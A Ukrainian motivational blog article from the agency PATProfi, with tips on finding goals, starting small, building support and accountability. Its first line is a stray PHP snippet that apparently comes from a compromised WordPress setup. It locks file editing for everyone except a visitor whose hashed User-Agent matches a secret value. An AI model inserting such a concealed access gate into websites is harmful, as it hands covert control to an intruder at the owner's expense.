if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Встигайте більше! Як знайти мотивацію рухатися далі, працювати і щось міняти у Києві, Україні за доступними цінами від агентства PATProfi

Встигайте більше! Як знайти мотивацію рухатися далі, працювати і щось міняти

Встигайте більше! Як знайти мотивацію рухатися далі, працювати і щось міняти

Ми не так вже далеко пішли від своїх біологічних предків. У моменти криз включається реакція «бий або біжи», а в ситуаціях невизначеності мозок дає команду «замри». Опиратися своїй природі складно, але необхідно – особливо якщо ви амбітна, цілеспрямована людина, яка звикла рухатися вперед і вести за собою інших.

А навіщо, власне, рухатися? ..

Може, прислухатися до інстинкту, перепочити від гонок на короткі і довгі дистанції, дозволити собі нарешті розслабитися? Втративши мотивацію і припинивши діяти, ми:

  • занурюємося у невдоволення ситуацією і собою,
  • набуваємо погані звички – до прокрастинації, до перекладання відповідальності і відмови від неї, до нескінченного відкладання справ на потім,
  • живемо минулим, в кращому випадку – теперішнім, і перестаємо відчувати майбутнє,
  • не отримуємо нового досвіду, знань і навичок,
  • втрачаємо цікаві можливості для бізнесу і особистісного зростання.

Все як у відомій історії Льюїса Керролла: переставши бігти вперед, ми швидко рухаємося назад. Підкажемо, як знайти мотивацію, щоб жити активно, працювати без зривів і змінювати життя на краще.

Знайдіть мету

Добре, якщо ви її вже знаєте. Але якщо питання мотивації виникає знову і знову, а також в смутні, малозрозумілі часи і економічні кризи, – корисно свою мету переглянути. Якщо мета не чітка, допоможе просте запитання: на що ви захочете озирнутися в кінці життя? Влаштуйтеся зручніше, візьміть аркуш паперу і ручку, пишіть, малюйте майнд-карти і скетчі. Трохи завзятості – і мета знайдеться, а мотивація рухатися до неї з’явиться.

Почніть повільно

15-хвилинне домашнє тренування краще, ніж сумні свідчення крокоміра про те, що ви і 2000 кроків за день не пройшли. Визначте першу дію у бік мети – і просто виконайте її, без пошуку мотивації і самовмовляння. Вони, до речі, не знадобляться, якщо вибрана дію максимально проста і зрозуміла.

Створіть простір

Ви не зможете рухатися вперед і змінюватися, якщо не створите маленький простір для маневрів. Коли ви приступите до справи – вранці, ввечері, під час обідньої перерви? В якій точці простору, в якій кімнаті в будинку ви будете в цей момент знаходитися? Що потрібно підготувати, щоб працювалося комфортно? Забронюйте час і місце, поставтеся до будь-якої мінімальної задачі як до проекту, декомпозуйте її на ресурси, учасників, результати, дедлайни.

«Увімкніть» тумблер радості

Якщо сил і бажання ні на що немає, але робити це доводиться, починайте з чогось позитивного, що доставляє вам задоволення. Ви вирішили вдосконалити навички та отримати додаткову освіту? Знайдіть форум однодумців і почитайте їхні враження. Помилуйтеся на сайті школи на сертифікати, які зовсім скоро будуть прикрашати ваше робоче місце. Поставте на екран робочого столу заставку з котом, який вчиться.

Оточіть себе правильним оточенням

Кращий спосіб змінюватися або навіть просто не зупинятися, рухаючись вперед і вирішуючи завдання, – це оточити себе людьми, які будуть хвалити вас за зусилля і зміни. Створіть команду підтримки, яка буде надихати і акуратно «штовхати» вас. В умовах віддаленої роботи це може бути нелегко, але виручить скайп, зуми, дзвінки в месенджерах і чати в Телеграмі. Головне, щоб оточення поділялося позитивом і успіхами, а не страхами і «коронакризисними» новинами.

Знайдіть «кумира»

Це не обов’язково повинен бути суперпродуктивний Ілон Маск або геній маркетингу Стів Джобс. Навіть серед людей зі списку Forbes і популярних блогерів шукати не обов’язково. Прикладів для наслідування багато в оточенні кожного з нас – потрібно лише подивитися уважно. Будь то ваш батько, дядько або керівник компанії, в якій ви працюєте, для руху вперед вам буде досить їх надихаючих історій, особистого прикладу і – якщо пощастить поспілкуватися «наживо» – авторських Лайфхак. Можуть вони – зможете і ви.

Ставте посильні завдання

Один погляд на список із сотні завдань здатний знищити мотивацію ці завдання виконувати. Зі здоровим скептицизмом плануйте день і розраховуйте час, адже раптові дзвінки, зустрічі, завдання формату «потрібно на вчора» час від часу трапляються з усіма. Як радять деякі гуру особистої ефективності: щоб більше встигати – іноді потрібно менше планувати.

Продумайте підзвітність

Знайдіть, принаймні, одну людину, яка буде залучати Вас до відповідальності за бездіяльність. Це може бути група підтримки, згадана вище, або коуч-психолог, або «бадді», або навіть ви самі. Головне, щоб для усих були зрозумілі критерії – коли ви «молодець», а коли потрібно нагадати вам про мету.

Навіть якщо важко, навіть якщо незрозумілий напрямок і перспективи, навіть якщо накриває апатія, і майже вже виробилася звичка до ліні – рухайтеся. Один крок вперед, потім наступний. Так і відбуваються зміни.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.